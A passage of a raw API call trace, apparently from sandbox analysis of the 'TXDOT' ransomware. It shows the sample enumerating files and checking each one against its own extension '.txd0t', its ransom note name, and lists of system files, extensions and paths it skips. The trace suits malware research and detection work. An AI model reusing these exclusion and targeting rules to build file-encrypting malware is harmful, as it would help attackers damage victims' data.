StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1042", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042") returned="C:\\588bce7c90097ed212\\1042" [0071.415] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1042", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042\\") returned="C:\\588bce7c90097ed212\\1042\\" [0071.415] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1042\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned="C:\\588bce7c90097ed212\\1042\\eula.rtf" [0071.415] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.415] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0071.415] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0071.415] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0071.415] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0071.415] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0071.415] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0071.415] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0071.415] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0071.415] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0071.415] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0071.415] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0071.416] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0071.416] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0071.416] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0071.416] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.416] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.416] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0071.416] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.416] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.416] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.416] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.416] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.416] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.416] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xfed6, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0071.416] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0071.416] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0071.416] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1042", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042") returned="C:\\588bce7c90097ed212\\1042" [0071.416] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1042", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042\\") returned="C:\\588bce7c90097ed212\\1042\\" [0071.416] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1042\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" [0071.416] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.416] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0071.416] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0071.416] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0071.416] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0071.416] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0071.416] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0071.416] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0071.416] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0071.416] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0071.416] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0071.416] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0071.416] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0071.416] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0071.417] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0071.417] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.417] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.417] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0071.417] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.417] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.417] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.417] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.417] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.417] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.417] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0071.417] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0071.417] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0071.417] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1042", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042") returned="C:\\588bce7c90097ed212\\1042" [0071.417] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1042", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042\\") returned="C:\\588bce7c90097ed212\\1042\\" [0071.417] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1042\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1042\\SetupResources.dll" [0071.417] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.417] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0071.417] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0071.417] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0071.417] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0071.417] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0071.417] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0071.417] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0071.417] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0071.417] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0071.417] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0071.417] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0071.417] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0071.417] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0071.418] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0071.418] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.418] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.418] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.418] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0071.418] FindClose (in: hFindFile=0xec27f0 | out: hFindFile=0xec27f0) returned 1 [0071.418] GetProcessHeap () returned 0xe30000 [0071.418] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec8320 | out: hHeap=0xe30000) returned 1 [0071.418] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1043", cAlternateFileName="")) returned 1 [0071.418] StrCmpW (psz1="1043", psz2=".") returned 1 [0071.418] StrCmpW (psz1="1043", psz2="..") returned 1 [0071.418] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.418] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.418] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1043", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1043") returned="C:\\588bce7c90097ed212\\1043" [0071.418] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\windows\\system32\\") returned 0x0 [0071.418] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\windows\\syswow64\\") returned 0x0 [0071.418] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\windows\\system\\") returned 0x0 [0071.418] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\windows\\winsxs\\") returned 0x0 [0071.418] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\appdata\\roaming\\") returned 0x0 [0071.418] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\appdata\\local\\") returned 0x0 [0071.418] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\appdata\\locallow\\") returned 0x0 [0071.418] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\all users\\microsoft\\") returned 0x0 [0071.418] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\inetpub\\logs\\") returned 0x0 [0071.418] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch=":\\boot\\") returned 0x0 [0071.418] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch=":\\perflogs\\") returned 0x0 [0071.418] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch=":\\programdata\\") returned 0x0 [0071.418] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch=":\\drivers\\") returned 0x0 [0071.418] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch=":\\wsus\\") returned 0x0 [0071.419] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch=":\\efstmpwp\\") returned 0x0 [0071.419] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch=":\\$recycle.bin\\") returned 0x0 [0071.419] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="crypt_detect") returned 0x0 [0071.419] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="cryptolocker") returned 0x0 [0071.419] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="ransomware") returned 0x0 [0071.419] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="C:\\WINDOWS") returned 0x0 [0071.419] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="C:\\Program Files (x86)") returned 0x0 [0071.419] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="C:\\Program Files") returned 0x0 [0071.419] GetProcessHeap () returned 0xe30000 [0071.419] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xec8320 [0071.419] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1043", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043") returned="C:\\588bce7c90097ed212\\1043" [0071.419] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1043", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043\\*") returned="C:\\588bce7c90097ed212\\1043\\*" [0071.419] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1043\\*", lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec25b0 [0071.419] StrCmpW (psz1=".", psz2=".") returned 0 [0071.419] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.419] StrCmpW (psz1="..", psz2=".") returned 1 [0071.419] StrCmpW (psz1="..", psz2="..") returned 0 [0071.419] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdda, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0071.419] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0071.419] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0071.419] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1043", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043") returned="C:\\588bce7c90097ed212\\1043" [0071.419] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1043", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043\\") returned="C:\\588bce7c90097ed212\\1043\\" [0071.419] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1043\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043\\eula.rtf") returned="C:\\588bce7c90097ed212\\1043\\eula.rtf" [0071.419] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.420] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0071.420] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0071.420] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0071.420] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0071.420] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0071.420] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0071.420] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0071.420] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0071.420] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0071.420] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0071.420] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0071.420] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0071.420] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0071.420] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0071.420] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.420] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.420] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0071.420] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.420] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.420] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.420] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.420] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.420] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.420] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13712, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0071.420] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0071.420] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0071.420] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1043", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043") returned="C:\\588bce7c90097ed212\\1043" [0071.420] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1043", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043\\") returned="C:\\588bce7c90097ed212\\1043\\" [0071.420] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1043\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" [0071.420] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.420] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0071.420] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0071.421] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0071.421] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0071.421] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0071.421] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0071.421] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0071.421] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0071.421] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0071.421] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0071.421] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0071.421] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0071.421] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0071.421] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0071.421] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.421] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.421] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0071.421] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.421] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.421] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.421] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.421] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.421] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.421] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0071.421] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0071.421] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0071.421] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1043", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043") returned="C:\\588bce7c90097ed212\\1043" [0071.421] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1043", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043\\") returned="C:\\588bce7c90097ed212\\1043\\" [0071.421] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1043\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1043\\SetupResources.dll" [0071.421] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.421] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0071.421] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0071.421] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0071.421] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0071.422] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0071.422] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0071.422] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0071.422] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0071.422] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0071.422] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0071.422] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0071.422] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0071.422] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0071.422] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0071.422] StrCmpIW (psz1="SetupResources.dll", 